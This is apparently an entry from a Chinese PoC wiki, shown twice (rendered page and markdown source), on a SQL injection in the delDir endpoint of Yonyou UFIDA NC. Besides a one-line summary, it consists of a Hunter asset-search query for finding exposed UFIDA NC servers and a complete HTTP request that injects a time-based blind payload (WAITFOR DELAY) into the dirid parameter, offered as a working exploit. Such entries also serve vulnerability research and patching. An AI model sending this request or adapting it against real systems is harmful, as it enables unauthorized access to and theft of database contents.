fofamini-wiki

登录白背景

源码

用友UFIDA NC delDir存在SQL注入漏洞

一、漏洞简介

用友UFIDA NC delDir存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

二、影响版本

用友UFIDA NC

三、资产测绘

hunterapp.name="用友 UFIDA NC"
特征

四、漏洞复现

GET /portal/ptt/album/edit?cmd=delDir&dirid=1';WAITFOR+DELAY'0:0:5'--+ HTTP/1.1
Host: xx.xx.xx.xx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=8EBDF4C237BC5C74D3DCFBC03A800E45.server1; sl-session=jDXMDyG3JGVNQdvtd8uUlQ==; JSESSIONID=5BD4AC755F0F34EF57DA011EAD45C94C.server1
Connection: close

原文: https://www.yuque.com/xiaokp7/ocvun2/ewph6qkgp8gxvuf9

# 用友UFIDA NC delDir存在SQL注入漏洞

# 一、漏洞简介
用友UFIDA NC delDir存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。

# 二、影响版本

- 用友UFIDA NC

# 三、资产测绘

- hunter`app.name="用友 UFIDA NC"`
- 特征

![image.png](./img/RMxxm-9RFfyNExnS/1695490122461-e51a4960-cbf1-4f8b-b3af-1de065806b72-189543.png)

# 四、漏洞复现
```
GET /portal/ptt/album/edit?cmd=delDir&dirid=1';WAITFOR+DELAY'0:0:5'--+ HTTP/1.1
Host: xx.xx.xx.xx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: JSESSIONID=8EBDF4C237BC5C74D3DCFBC03A800E45.server1; sl-session=jDXMDyG3JGVNQdvtd8uUlQ==; JSESSIONID=5BD4AC755F0F34EF57DA011EAD45C94C.server1
Connection: close
```
![image.png](./img/RMxxm-9RFfyNExnS/1699582480003-d8bcb994-30d2-47c4-ac5b-7d0b2e6b0a44-527991.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ewph6qkgp8gxvuf9>